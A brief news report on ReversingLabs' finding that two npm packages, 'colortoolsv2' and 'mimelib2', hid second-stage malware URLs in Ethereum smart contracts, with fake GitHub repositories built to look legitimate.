Security researchers at ReversingLabs have uncovered a sophisticated new attack method where hackers are using Ethereum smart contracts to hide malicious code within open-source software packages. The discovery, made public this week, involves two malicious packages uploaded to the Node Package Manager (NPM) repository in July 2025: "colortoolsv2" and "mimelib2".
These packages appeared to be harmless utilities but contained hidden references to Ethereum smart contracts that stored URLs pointing to second-stage malware. When developers integrated these compromised packages into their projects, the hidden code would trigger downloads of dangerous payloads, effectively bypassing traditional security scans that are not designed to inspect blockchain data for threats.
ReversingLabs researcher Lucija Valentić described this as a "novel technique" highlighting the rapid evolution of detection evasion strategies. The attackers further camouflaged their activity by creating fake GitHub repositories posing as cryptocurrency trading bots, complete with fabricated commits and inflated star counts to appear legitimate.
This development represents a significant escalation in software supply chain attacks, leveraging the immutable nature of blockchain technology to create persistent threats that are difficult to detect and remove once deployed.